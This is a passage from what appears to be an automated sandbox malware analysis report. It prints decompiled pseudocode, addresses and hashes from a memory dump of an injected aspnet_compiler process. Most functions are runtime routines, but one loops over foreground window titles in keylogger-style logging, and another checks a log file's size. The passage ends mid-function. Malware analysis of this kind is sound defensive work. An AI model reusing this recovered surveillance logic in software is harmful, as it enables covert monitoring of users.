				signed int _t121;
				signed int _t128;
				signed int* _t129;
				signed int _t136;
				signed int _t137;
				char _t138;
				signed int _t139;
				signed int _t142;
				signed int _t146;
				signed int _t151;
				char _t156;
				char _t157;
				void* _t161;
				unsigned int _t162;
				signed int _t164;
				signed int _t166;
				signed int _t170;
				void* _t171;
				signed int* _t172;
				signed int _t174;
				signed int _t181;
				signed int _t182;
				signed int _t183;
				signed int _t184;
				signed int _t185;
				signed int _t186;
				signed int _t187;

				_t171 = __edx;
				_t181 = _a24;
				if(_t181 < 0) {
					_t181 = 0;
				}
				_t184 = _a8;
				 *_t184 = 0;
				E004390B7(0,  &_v52, _t171, _a36);
				_t5 = _t181 + 0xb; // 0xb
				if(_a12 > _t5) {
					_t172 = _a4;
					_t142 = _t172[1];
					_v36 =  *_t172;
					__eflags = (_t142 >> 0x00000014 & 0x000007ff) - 0x7ff;
					if((_t142 >> 0x00000014 & 0x000007ff) != 0x7ff) {
						L11:
						__eflags = _t142 & 0x80000000;
						if((_t142 & 0x80000000) != 0) {
							 *_t184 = 0x2d;
							_t184 = _t184 + 1;
							__eflags = _t184;
						}
						__eflags = _a28;
						_v16 = 0x3ff;
						_t136 = ((0 | _a28 == 0x00000000) - 0x00000001 & 0xffffffe0) + 0x27;
						__eflags = _t172[1] & 0x7ff00000;
						_v32 = _t136;
						_t86 = 0x30;
						if((_t172[1] & 0x7ff00000) != 0) {
							 *_t184 = 0x31;
							_t185 = _t184 + 1;
							__eflags = _t185;
						} else {
							 *_t184 = _t86;
							_t185 = _t184 + 1;
							_t164 =  *_t172 | _t172[1] & 0x000fffff;
							__eflags = _t164;
							if(_t164 != 0) {
								_v16 = 0x3fe;
							} else {
								_v16 = _v16 & _t164;
							}
						}
						_t146 = _t185;
						_t186 = _t185 + 1;
						_v28 = _t146;
						__eflags = _t181;
						if(_t181 != 0) {
							_t30 = _v48 + 0x88; // 0xff1875ff
							 *_t146 =  *((intOrPtr*)( *((intOrPtr*)( *_t30))));
						} else {
							 *_t146 = 0;
						}
						_t92 = _t172[1] & 0x000fffff;
						__eflags = _t92;
						_v20 = _t92;
						if(_t92 > 0) {
							L23:
							_t33 =  &_v8;
							 *_t33 = _v8 & 0x00000000;
							__eflags =  *_t33;
							_t147 = 0xf0000;
							_t93 = 0x30;
							_v12 = _t93;
							_v20 = 0xf0000;
							do {
								__eflags = _t181;
								if(_t181 <= 0) {
									break;
								}
								_t119 = E00456060( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
								_t161 = 0x30;
								_t121 = _t119 + _t161 & 0x0000ffff;
								__eflags = _t121 - 0x39;
								if(_t121 > 0x39) {
									_t121 = _t121 + _t136;
									__eflags = _t121;
								}
								_t162 = _v20;
								_t172 = _a4;
								 *_t186 = _t121;
								_t186 = _t186 + 1;
								_v8 = (_t162 << 0x00000020 | _v8) >> 4;
								_t147 = _t162 >> 4;
								_t93 = _v12 - 4;
								_t181 = _t181 - 1;
								_v20 = _t162 >> 4;
								_v12 = _t93;
								__eflags = _t93;
							} while (_t93 >= 0);
							__eflags = _t93;
							if(_t93 < 0) {
								goto L39;
							}
							_t115 = E00456060( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
							__eflags = _t115 - 8;
							if(_t115 <= 8) {
								goto L39;
							}
							_t54 = _t186 - 1; // 0xff8bc35f
							_t116 = _t54;
							_t138 = 0x30;
							while(1) {
								_t156 =  *_t116;
								__eflags = _t156 - 0x66;
								if(_t156 == 0x66) {
									goto L33;
								}
								__eflags = _t156 - 0x46;
								if(_t156 != 0x46) {
									_t139 = _v32;
									__eflags = _t116 - _v28;
									if(_t116 == _v28) {
										_t57 = _t116 - 1;
										 *_t57 =  *(_t116 - 1) + 1;
										__eflags =  *_t57;
									} else {
										_t157 =  *_t116;
										__eflags = _t157 - 0x39;
										if(_t157 != 0x39) {
											 *_t116 = _t157 + 1;
										} else {
											 *_t116 = _t139 + 0x3a;
										}
									}
									goto L39;
								}
								L33:
								 *_t116 = _t138;
								_t116 = _t116 - 1;
							}
						} else {
							__eflags =  *_t172;
							if( *_t172 <= 0) {
								L39:
								__eflags = _t181;
								if(_t181 > 0) {
									_push(_t181);
									_t111 = 0x30;
									_push(_t111);
									_push(_t186);
									E00435760(_t181);
									_t186 = _t186 + _t181;
									__eflags = _t186;
								}
								_t94 = _v28;
								__eflags =  *_t94;
								if( *_t94 == 0) {
									_t186 = _t94;
								}
								__eflags = _a28;
								 *_t186 = ((_t94 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
								_t174 = _a4[1];
								_t100 = E00456060( *_a4, 0x34, _t174);
								_t137 = 0;
								_t151 = (_t100 & 0x000007ff) - _v16;
								__eflags = _t151;
								asm("sbb ebx, ebx");
								if(__eflags < 0) {
									L47:
									 *(_t186 + 1) = 0x2d;
									_t187 = _t186 + 2;
									__eflags = _t187;
									_t151 =  ~_t151;
									asm("adc ebx, 0x0");
									_t137 =  ~_t137;
									goto L48;
								} else {
									if(__eflags > 0) {
										L46:
										 *(_t186 + 1) = 0x2b;
										_t187 = _t186 + 2;
										L48:
										_t182 = _t187;
										_t101 = 0x30;
										 *_t187 = _t101;
										__eflags = _t137;
										if(__eflags < 0) {
											L56:
											__eflags = _t187 - _t182;
											if(_t187 != _t182) {
												L60:
												_push(0);
												_push(0xa);
												_push(_t137);
												_push(_t151);
												_t102 = E00455D60();
												_v32 = _t174;
												 *_t187 = _t102 + 0x30;
												_t187 = _t187 + 1;
												__eflags = _t187;
												L61:
												_t104 = 0x30;
												_t183 = 0;
												__eflags = 0;
												 *_t187 = _t151 + _t104;
												 *(_t187 + 1) = 0;
												goto L62;
											}
											__eflags = _t137;
											if(__eflags < 0) {
												goto L61;
											}
											if(__eflags > 0) {
												goto L60;
											}
											__eflags = _t151 - 0xa;
											if(_t151 < 0xa) {
												goto L61;
											}
											goto L60;
										}
										if(__eflags > 0) {
											L51:
											_push(0);
											_push(0x3e8);
											_push(_t137);
											_push(_t151);
											_t107 = E00455D60();
											_v32 = _t174;
											 *_t187 = _t107 + 0x30;
											_t187 = _t187 + 1;
											__eflags = _t187 - _t182;
											if(_t187 != _t182) {
												L55:
												_push(0);
												_push(0x64);
												_push(_t137);
												_push(_t151);
												_t109 = E00455D60();
												_v32 = _t174;
												 *_t187 = _t109 + 0x30;
												_t187 = _t187 + 1;
												__eflags = _t187;
												goto L56;
											}
											L52:
											__eflags = _t137;
											if(__eflags < 0) {
												goto L56;
											}
											if(__eflags > 0) {
												goto L55;
											}
											__eflags = _t151 - 0x64;
											if(_t151 < 0x64) {
												goto L56;
											}
											goto L55;
										}
										__eflags = _t151 - 0x3e8;
										if(_t151 < 0x3e8) {
											goto L52;
										}
										goto L51;
									}
									__eflags = _t151;
									if(_t151 < 0) {
										goto L47;
									}
									goto L46;
								}
							}
							goto L23;
						}
					}
					__eflags = 0;
					if(0 != 0) {
						goto L11;
					} else {
						_t183 = E00448B87(0, _t142, 0, _t172, _t184, _a12, _a16, _a20, _t181, 0, _a32, 0);
						__eflags = _t183;
						if(_t183 == 0) {
							_t128 = E00456140(_t184, 0x65);
							_pop(_t166);
							__eflags = _t128;
							if(_t128 != 0) {
								__eflags = _a28;
								_t170 = ((_t166 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
								__eflags = _t170;
								 *_t128 = _t170;
								 *((char*)(_t128 + 3)) = 0;
							}
							_t183 = 0;
						} else {
							 *_t184 = 0;
						}
						goto L62;
					}
				} else {
					_t129 = E0043EEAD();
					_t183 = 0x22;
					 *_t129 = _t183;
					E0043A5BB();
					L62:
					if(_v40 != 0) {
						 *(_v52 + 0x350) =  *(_v52 + 0x350) & 0xfffffffd;
					}
					return _t183;
				}
			}
























































                0x00448884
                0x0044888f
                0x00448896
                0x00448898
                0x00448898
                0x0044889a
                0x004488a3
                0x004488a5
                0x004488aa
                0x004488b0
                0x004488c6
                0x004488cb
                0x004488ce
                0x004488db
                0x004488e0
                0x00448934
                0x0044893c
                0x0044893e
                0x00448940
                0x00448943
                0x00448943
                0x00448943
                0x00448949
                0x00448951
                0x00448964
                0x00448967
                0x00448969
                0x0044896c
                0x0044896d
                0x0044898e
                0x00448991
                0x00448991
                0x0044896f
                0x0044896f
                0x00448971
                0x0044897c
                0x0044897c
                0x0044897e
                0x00448985
                0x00448980
                0x00448980
                0x00448980
                0x0044897e
                0x00448992
                0x00448994
                0x00448995
                0x00448998
                0x0044899a
                0x004489a4
                0x004489ae
                0x0044899c
                0x0044899c
                0x0044899c
                0x004489b3
                0x004489b3
                0x004489b8
                0x004489bb
                0x004489c6
                0x004489c6
                0x004489c6
                0x004489c6
                0x004489ca
                0x004489d1
                0x004489d2
                0x004489d5
                0x004489d8
                0x004489d8
                0x004489da
                0x00000000
                0x00000000
                0x004489f2
                0x004489f9
                0x004489fd
                0x00448a00
                0x00448a03
                0x00448a05
                0x00448a05
                0x00448a05
                0x00448a07
                0x00448a0a
                0x00448a0d
                0x00448a0f
                0x00448a17
                0x00448a1d
                0x00448a20
                0x00448a23
                0x00448a24
                0x00448a27
                0x00448a2a
                0x00448a2a
                0x00448a2f
                0x00448a32
                0x00000000
                0x00000000
                0x00448a4a
                0x00448a4f
                0x00448a53
                0x00000000
                0x00000000
                0x00448a57
                0x00448a57
                0x00448a5a
                0x00448a5b
                0x00448a5b
                0x00448a5d
                0x00448a60
                0x00000000
                0x00000000
                0x00448a62
                0x00448a65
                0x00448a6c
                0x00448a6f
                0x00448a72
                0x00448a88
                0x00448a88
                0x00448a88
                0x00448a74
                0x00448a74
                0x00448a76
                0x00448a79
                0x00448a84
                0x00448a7b
                0x00448a7e
                0x00448a7e
                0x00448a79
                0x00000000
                0x00448a72
                0x00448a67
                0x00448a67
                0x00448a69
                0x00448a69
                0x004489bd
                0x004489bd
                0x004489c0
                0x00448a8b
                0x00448a8b
                0x00448a8d
                0x00448a8f
                0x00448a92
                0x00448a93
                0x00448a94
                0x00448a95
                0x00448a9d
                0x00448a9d
                0x00448a9d
                0x00448a9f
                0x00448aa2
                0x00448aa5
                0x00448aa7
                0x00448aa7
                0x00448aa9
                0x00448abb
                0x00448abf
                0x00448ac2
                0x00448ac9
                0x00448ad1
                0x00448ad1
                0x00448ad4
                0x00448ad6
                0x00448ae7
                0x00448ae7
                0x00448aeb
                0x00448aeb
                0x00448aee
                0x00448af0
                0x00448af3
                0x00000000
                0x00448ad8
                0x00448ad8
                0x00448ade
                0x00448ade
                0x00448ae2
                0x00448af5
                0x00448af5
                0x00448af9
                0x00448afa
                0x00448afc
                0x00448afe
                0x00448b3f
                0x00448b3f
                0x00448b41
                0x00448b4e
                0x00448b4e
                0x00448b50
                0x00448b52
                0x00448b53
                0x00448b54
                0x00448b5b
                0x00448b5e
                0x00448b60
                0x00448b60
                0x00448b61
                0x00448b63
                0x00448b66
                0x00448b66
                0x00448b68
                0x00448b6a
                0x00000000
                0x00448b6a
                0x00448b43
                0x00448b45
                0x00000000
                0x00000000
                0x00448b47
                0x00000000
                0x00000000
                0x00448b49
                0x00448b4c
                0x00000000
                0x00000000
                0x00000000
                0x00448b4c
                0x00448b05
                0x00448b0b
                0x00448b0b
                0x00448b0d
                0x00448b0e
                0x00448b0f
                0x00448b10
                0x00448b17
                0x00448b1a
                0x00448b1c
                0x00448b1d
                0x00448b1f
                0x00448b2c
                0x00448b2c
                0x00448b2e
                0x00448b30
                0x00448b31
                0x00448b32
                0x00448b39
                0x00448b3c
                0x00448b3e
                0x00448b3e
                0x00000000
                0x00448b3e
                0x00448b21
                0x00448b21
                0x00448b23
                0x00000000
                0x00000000
                0x00448b25
                0x00000000
                0x00000000
                0x00448b27
                0x00448b2a
                0x00000000
                0x00000000
                0x00000000
                0x00448b2a
                0x00448b07
                0x00448b09
                0x00000000
                0x00000000
                0x00000000
                0x00448b09
                0x00448ada
                0x00448adc
                0x00000000
                0x00000000
                0x00000000
                0x00448adc
                0x00448ad6
                0x00000000
                0x004489c0
                0x004489bb
                0x004488e2
                0x004488e4
                0x00000000
                0x004488e6
                0x004488fc
                0x00448901
                0x00448903
                0x0044890f
                0x00448915
                0x00448916
                0x00448918
                0x0044891a
                0x00448925
                0x00448925
                0x00448928
                0x0044892a
                0x0044892a
                0x0044892d
                0x00448905
                0x00448905
                0x00448905
                0x00000000
                0x00448903
                0x004488b2
                0x004488b2
                0x004488b9
                0x004488ba
                0x004488bc
                0x00448b6e
                0x00448b72
                0x00448b77
                0x00448b77
                0x00448b86
                0x00448b86

                APIs
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: __alldvrm$_strrchr
                • String ID:
                • API String ID: 1036877536-0
                • Opcode ID: 500b6b3c067367f1283b5ca09d132384efb29a74f12a76b3a308fd1f824a21bf
                • Instruction ID: 2e0d047c9ab5e1f9e195ebe2db35710396bb8e1c860b674ed94f75fdd8067eee
                • Opcode Fuzzy Hash: 500b6b3c067367f1283b5ca09d132384efb29a74f12a76b3a308fd1f824a21bf
                • Instruction Fuzzy Hash: 26A138B19006869FFB21CF18C8917BEBBA1EF15314F18416FE885AB381CA7C9946C759
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004410D1 Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                Download Yara Rule
                C-Code - Quality: 95%
                			E004410D1(void* _a4, intOrPtr* _a8) {
				char _v5;
				intOrPtr _v12;
				char _v16;
				signed int _t44;
				char _t47;
				intOrPtr _t50;
				signed int _t52;
				signed int _t56;
				signed int _t57;
				void* _t59;
				signed int _t63;
				signed int _t65;
				char _t67;
				intOrPtr* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t75;
				void* _t76;
				void* _t77;
				signed int _t80;
				intOrPtr _t82;
				void* _t86;
				signed int _t87;
				void* _t89;
				signed int _t91;
				intOrPtr* _t98;
				void* _t101;
				intOrPtr _t102;
				intOrPtr _t103;

				_t101 = _a4;
				if(_t101 != 0) {
					_t80 = 9;
					memset(_t101, _t44 | 0xffffffff, _t80 << 2);
					_t98 = _a8;
					__eflags = _t98;
					if(_t98 != 0) {
						_t82 =  *((intOrPtr*)(_t98 + 4));
						_t47 =  *_t98;
						_v16 = _t47;
						_v12 = _t82;
						__eflags = _t82 - 0xffffffff;
						if(__eflags > 0) {
							L7:
							_t89 = 7;
							__eflags = _t82 - _t89;
							if(__eflags < 0) {
								L12:
								_v5 = 0;
								_t50 = E0044121E(_t82, __eflags,  &_v16,  &_v5);
								_t75 = _v16;
								 *((intOrPtr*)(_t101 + 0x14)) = _t50;
								_t52 = E00455E40(_t75, _v12, 0x15180, 0);
								 *(_t101 + 0x1c) = _t52;
								_t86 = 0x45d2a0;
								_t76 = _t75 - _t52 * 0x15180;
								asm("sbb eax, edx");
								__eflags = _v5;
								if(_v5 == 0) {
									_t86 = 0x45d26c;
								}
								_t91 =  *(_t101 + 0x1c);
								_t56 = 1;
								__eflags =  *((intOrPtr*)(_t86 + 4)) - _t91;
								if( *((intOrPtr*)(_t86 + 4)) >= _t91) {
									L16:
									_t57 = _t56 - 1;
									 *(_t101 + 0x10) = _t57;
									 *((intOrPtr*)(_t101 + 0xc)) = _t91 -  *((intOrPtr*)(_t86 + _t57 * 4));
									_t59 = E00455E40( *_t98,  *((intOrPtr*)(_t98 + 4)), 0x15180, 0);
									_t87 = 7;
									asm("cdq");
									 *(_t101 + 0x18) = (_t59 + 4) % _t87;
									_t63 = E00455E40(_t76, _v12, 0xe10, 0);
									 *(_t101 + 8) = _t63;
									_t77 = _t76 - _t63 * 0xe10;
									asm("sbb edi, edx");
									_t65 = E00455E40(_t77, _v12, 0x3c, 0);
									 *(_t101 + 0x20) =  *(_t101 + 0x20) & 0x00000000;
									 *(_t101 + 4) = _t65;
									_t67 = 0;
									__eflags = 0;
									 *_t101 = _t77 - _t65 * 0x3c;
									L17:
									return _t67;
								} else {
									do {
										_t56 = _t56 + 1;
										__eflags =  *((intOrPtr*)(_t86 + _t56 * 4)) - _t91;
									} while ( *((intOrPtr*)(_t86 + _t56 * 4)) < _t91);
									goto L16;
								}
							}
							if(__eflags > 0) {
								L10:
								_t68 = E0043EEAD();
								_t102 = 0x16;
								 *_t68 = _t102;
								L11:
								_t67 = _t102;
								goto L17;
							}
							__eflags = _t47 - 0x934126cf;
							if(__eflags <= 0) {
								goto L12;
							}
							goto L10;
						}
						if(__eflags < 0) {
							goto L10;
						}
						__eflags = _t47 - 0xffff5740;
						if(_t47 < 0xffff5740) {
							goto L10;
						}
						goto L7;
					}
					_t69 = E0043EEAD();
					_t102 = 0x16;
					 *_t69 = _t102;
					E0043A5BB();
					goto L11;
				}
				_t71 = E0043EEAD();
				_t103 = 0x16;
				 *_t71 = _t103;
				E0043A5BB();
				return _t103;
			}
































                0x004410da
                0x004410df
                0x004410ff
                0x00441100
                0x00441102
                0x00441105
                0x00441107
                0x0044111a
                0x0044111d
                0x0044111f
                0x00441122
                0x00441125
                0x00441128
                0x00441133
                0x00441135
                0x00441136
                0x00441138
                0x00441154
                0x00441158
                0x00441161
                0x00441166
                0x0044116d
                0x0044117a
                0x0044117f
                0x00441189
                0x0044118e
                0x00441193
                0x00441195
                0x0044119c
                0x0044119e
                0x0044119e
                0x004411a3
                0x004411a8
                0x004411a9
                0x004411ac
                0x004411b4
                0x004411b4
                0x004411b5
                0x004411c3
                0x004411cb
                0x004411d8
                0x004411d9
                0x004411e3
                0x004411e9
                0x004411f3
                0x004411fa
                0x004411fe
                0x00441202
                0x00441207
                0x0044120b
                0x00441213
                0x00441213
                0x00441215
                0x00441218
                0x00000000
                0x004411ae
                0x004411ae
                0x004411ae
                0x004411af
                0x004411af
                0x00000000
                0x004411ae
                0x004411ac
                0x0044113a
                0x00441143
                0x00441143
                0x0044114a
                0x0044114b
                0x0044114d
                0x0044114d
                0x00000000
                0x0044114d
                0x0044113c
                0x00441141
                0x00000000
                0x00000000
                0x00000000
                0x00441141
                0x0044112a
                0x00000000
                0x00000000
                0x0044112c
                0x00441131
                0x00000000
                0x00000000
                0x00000000
                0x00441131
                0x00441109
                0x00441110
                0x00441111
                0x00441113
                0x00000000
                0x00441113
                0x004410e1
                0x004410e8
                0x004410e9
                0x004410eb
                0x00000000

                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: a29e3f5de5cebec34a78c42cfb7cc875d8341f1e05d24d12d06a310733f1c9eb
                • Instruction ID: 551359a9c080faf0a086328dfaf192d0d3c69e8e99468298c70d0e4e8f2cce1c
                • Opcode Fuzzy Hash: a29e3f5de5cebec34a78c42cfb7cc875d8341f1e05d24d12d06a310733f1c9eb
                • Instruction Fuzzy Hash: 47413A71A00704EFE7249F79CC42BAA7BA9EB8C714F10462FF101DB291D779A9818784
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00409A7A Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 81sleepCOMMON
                Download Yara Rule
                C-Code - Quality: 90%
                			E00409A7A() {
				char _v2004;
				char _v2012;
				char _v2028;
				void* _v2036;
				char _v2056;
				void* _v2060;
				char _v2080;
				void* _v2084;
				void* _t15;
				signed int _t17;
				void* _t29;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t57;
				void* _t61;
				signed int _t62;
				signed int _t63;
				void* _t64;
				void* _t65;
				void* _t66;
				void* _t67;
				void* _t68;

				_t63 = _t62 & 0xfffffff8;
				_t69 = _t63;
				_t64 = _t63 - 0x81c;
				_push(_t33);
				_t59 = _t34;
				_t61 = _t34 + 0x60;
				while(1) {
					E00435760(_t57,  &_v2004, 0, 0x7d0);
					_t65 = _t64 + 0xc;
					while(1) {
						_t15 = E00401F8B(E00401E45(0x473298, _t55, _t61, _t69, 0x2a));
						_t66 = _t65 - 0x18;
						E0040415E(_t33, _t66, _t55, _t61, _t15);
						_t17 = E0041AECA( &_v2012, _t55);
						_t65 = _t66 + 0x18;
						_t69 = _t17;
						if(_t17 != 0) {
							break;
						}
						Sleep(0x1f4);
					}
					_t55 = E004042DC(_t33,  &_v2056, L"\r\n[ ", _t61, __eflags, E0040415E(_t33,  &_v2028, _t55, _t61,  &_v2004));
					E00401EF3(_t59 + 4, _t20, _t59, E00402FF4(_t33,  &_v2080, _t20, _t57, _t61, __eflags, L" ]\r\n"));
					E00401EE9();
					E00401EE9();
					E00401EE9();
					_t67 = _t65 - 0x18;
					E004086D0(_t33, _t67, _t55, __eflags, _t61);
					E0040977E(_t59, _t55);
					while(1) {
						_t29 = E00401F8B(E00401E45(0x473298, _t55, _t61, __eflags, 0x2a));
						_t68 = _t67 - 0x18;
						E0040415E(_t33, _t68, _t55, _t61, _t29);
						_t31 = E0041AECA(0, _t55);
						_t64 = _t68 + 0x18;
						__eflags = _t31;
						if(__eflags == 0) {
							break;
						}
						Sleep(0x64);
					}
					E0040A64F(_t33, _t59, _t55);
				}
			}


























                0x00409a7d
                0x00409a7d
                0x00409a80
                0x00409a86
                0x00409a89
                0x00409a8b
                0x00409a8e
                0x00409a9a
                0x00409a9f
                0x00409aa2
                0x00409ab0
                0x00409ab5
                0x00409abb
                0x00409ac4
                0x00409ac9
                0x00409acc
                0x00409ace
                0x00000000
                0x00000000
                0x00409ad5
                0x00409ad5
                0x00409b00
                0x00409b10
                0x00409b19
                0x00409b22
                0x00409b2b
                0x00409b30
                0x00409b36
                0x00409b3d
                0x00409b42
                0x00409b50
                0x00409b55
                0x00409b5b
                0x00409b62
                0x00409b67
                0x00409b6a
                0x00409b6c
                0x00000000
                0x00000000
                0x00409b70
                0x00409b70
                0x00409b7a
                0x00409b7a

                APIs
                  • Part of subcall function 0041AECA: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041AEDA
                  • Part of subcall function 0041AECA: GetWindowTextLengthW.USER32(00000000), ref: 0041AEE3
                  • Part of subcall function 0041AECA: GetWindowTextW.USER32 ref: 0041AF0D
                • Sleep.KERNEL32(000001F4), ref: 00409AD5
                • Sleep.KERNEL32(00000064), ref: 00409B70
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID: Window$SleepText$ForegroundLength
                • String ID: [ $ ]
                • API String ID: 3309952895-93608704
                • Opcode ID: f41b57c652dca7258540d8898ca8d490b9a32e46edb9ec1ddae85787edb7c504
                • Instruction ID: c75d603df524a244733055fbd34c65f055766319f874fab2ee06841349c314ac
                • Opcode Fuzzy Hash: f41b57c652dca7258540d8898ca8d490b9a32e46edb9ec1ddae85787edb7c504
                • Instruction Fuzzy Hash: 9821AE3160420057C608BB76DC179AE76A99F91308F40057FF952771D3EE7DAA09869F
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00442303 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                Download Yara Rule
                C-Code - Quality: 82%
                			E00442303(signed int __eax, void* __ecx) {
				signed int _t2;
				signed int _t3;
				int _t10;
				int _t11;
				void* _t13;
				short** _t16;
				char* _t19;
				void* _t20;

				_t13 = __ecx;
				_t16 =  *0x4704e4; // 0x13fb350
				if(_t16 != 0) {
					_t10 = 0;
					while( *_t16 != _t10) {
						_t2 = WideCharToMultiByte(_t10, _t10,  *_t16, 0xffffffff, _t10, _t10, _t10, _t10);
						_t11 = _t2;
						if(_t11 == 0) {
							L11:
							_t3 = _t2 | 0xffffffff;
						} else {
							_t19 = E004443F4(_t13, _t11, 1);
							_pop(_t13);
							if(_t19 == 0) {
								L10:
								_t2 = E00445002(_t19);
								goto L11;
							} else {
								_t10 = 0;
								if(WideCharToMultiByte(0, 0,  *_t16, 0xffffffff, _t19, _t11, 0, 0) == 0) {
									goto L10;
								} else {
									_push(0);
									_push(_t19);
									E0044E33F();
									E00445002(0);
									_t20 = _t20 + 0xc;
									_t16 =  &(_t16[1]);
									continue;
								}
							}
						}
						L9:
						return _t3;
						goto L12;
					}
					_t3 = 0;
					goto L9;
				} else {
					return __eax | 0xffffffff;
				}
				L12:
			}











                0x00442303
                0x00442306
                0x0044230e
                0x00442317
                0x0044236c
                0x00442325
                0x0044232b
                0x0044232f
                0x0044237d
                0x0044237d
                0x00442331
                0x00442339
                0x0044233c
                0x0044233f
                0x00442376
                0x00442377
                0x00000000
                0x00442341
                0x0044234b
                0x00442357
                0x00000000
                0x00442359
                0x00442359
                0x0044235a
                0x0044235b
                0x00442361
                0x00442366
                0x00442369
                0x00000000
                0x00442369
                0x00442357
                0x0044233f
                0x00442372
                0x00442375
                0x00000000
                0x00442375
                0x00442370
                0x00000000
                0x00442310
                0x00442314
                0x00442314
                0x00000000

                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 4388830d366f02e0d0dea3569a7d37812047d6b1fee5cbedd9e993ba2e67f05b
                • Instruction ID: 928698612f51615fe1cf777c5292d1b4e42623037d2c96bc68a693b0eec0e686
                • Opcode Fuzzy Hash: 4388830d366f02e0d0dea3569a7d37812047d6b1fee5cbedd9e993ba2e67f05b
                • Instruction Fuzzy Hash: 3F01A7B26096167EFA201E797DC1F6B221DDF917B9B70033BF921612D5DBAC8C014168
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00442382 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                Download Yara Rule
                C-Code - Quality: 82%
                			E00442382(signed int __eax, void* __ecx) {
				signed int _t2;
				signed int _t3;
				int _t10;
				int _t11;
				void* _t13;
				char** _t16;
				short* _t19;
				void* _t20;

				_t13 = __ecx;
				_t16 =  *0x4704e0; // 0x13f4478
				if(_t16 != 0) {
					_t10 = 0;
					while( *_t16 != _t10) {
						_t2 = MultiByteToWideChar(_t10, _t10,  *_t16, 0xffffffff, _t10, _t10);
						_t11 = _t2;
						if(_t11 == 0) {
							L11:
							_t3 = _t2 | 0xffffffff;
						} else {
							_t19 = E004443F4(_t13, _t11, 2);
							_pop(_t13);
							if(_t19 == 0) {
								L10:
								_t2 = E00445002(_t19);
								goto L11;
							} else {
								_t10 = 0;
								if(MultiByteToWideChar(0, 0,  *_t16, 0xffffffff, _t19, _t11) == 0) {
									goto L10;
								} else {
									_push(0);
									_push(_t19);
									E0044E34A(_t13);
									E00445002(0);
									_t20 = _t20 + 0xc;
									_t16 =  &(_t16[1]);
									continue;
								}
							}
						}
						L9:
						return _t3;
						goto L12;
					}
					_t3 = 0;
					goto L9;
				} else {
					return __eax | 0xffffffff;
				}
				L12:
			}











                0x00442382
                0x00442385
                0x0044238d
                0x00442396
                0x004423e5
                0x004423a2
                0x004423a8
                0x004423ac
                0x004423f6
                0x004423f6
                0x004423ae
                0x004423b6
                0x004423b9
                0x004423bc
                0x004423ef
                0x004423f0
                0x00000000
                0x004423be
                0x004423c4
                0x004423d0
                0x00000000
                0x004423d2
                0x004423d2
                0x004423d3
                0x004423d4
                0x004423da
                0x004423df
                0x004423e2
                0x00000000
                0x004423e2
                0x004423d0
                0x004423bc
                0x004423eb
                0x004423ee
                0x00000000
                0x004423ee
                0x004423e9
                0x00000000
                0x0044238f
                0x00442393
                0x00442393
                0x00000000

                Memory Dump Source
                • Source File: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: aaa693d2fffba037f22f2958b6f997d505db036d08c455309056a26f69548708
                • Instruction ID: ffef20b579aa455cdcb3ec38d6af2d4eff98cb77a0cb65f0443bbc9c4ef6001c
                • Opcode Fuzzy Hash: aaa693d2fffba037f22f2958b6f997d505db036d08c455309056a26f69548708
                • Instruction Fuzzy Hash: 5101D6B22096127FF6211E797CC1D2B232DEF513BA365033BF921512D5DAACCC444168
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00409BE8 Relevance: 6.1, APIs: 4, Instructions: 58sleepfileCOMMON
                Download Yara Rule
                C-Code - Quality: 94%
                			E00409BE8(void* __ecx, char* __edx) {
				void* __ebx;
				int _t9;
				long _t14;
				char* _t22;
				void* _t23;
				void* _t24;
				void* _t25;
				void* _t30;

				_t22 = __edx;
				_t9 =  *0x4730e8 |  *0x4730ec;
				_t24 = __ecx;
				if(_t9 != 0) {
					 *((char*)(__ecx + 0x39)) = 0;
					do {
						_t9 = CreateFileW(E00401EE4(0x4730a0), 0x80000000, 7, 0, 3, 0x80, 0);
						_t23 = _t9;
						if(_t23 == 0xffffffff) {
							 *((char*)(_t24 + 0x39)) = 0;
						} else {
							_t14 = GetFileSize(_t23, 0);
							_t30 = 0 -  *0x4730ec;
							if(_t30 >= 0 && (_t30 > 0 || _t14 >=  *0x4730e8)) {
								 *((char*)(_t24 + 0x39)) = 1;
								if( *((intOrPtr*)(_t24 + 0x49)) != 0) {
									E0040A64F(0, _t24, _t22);
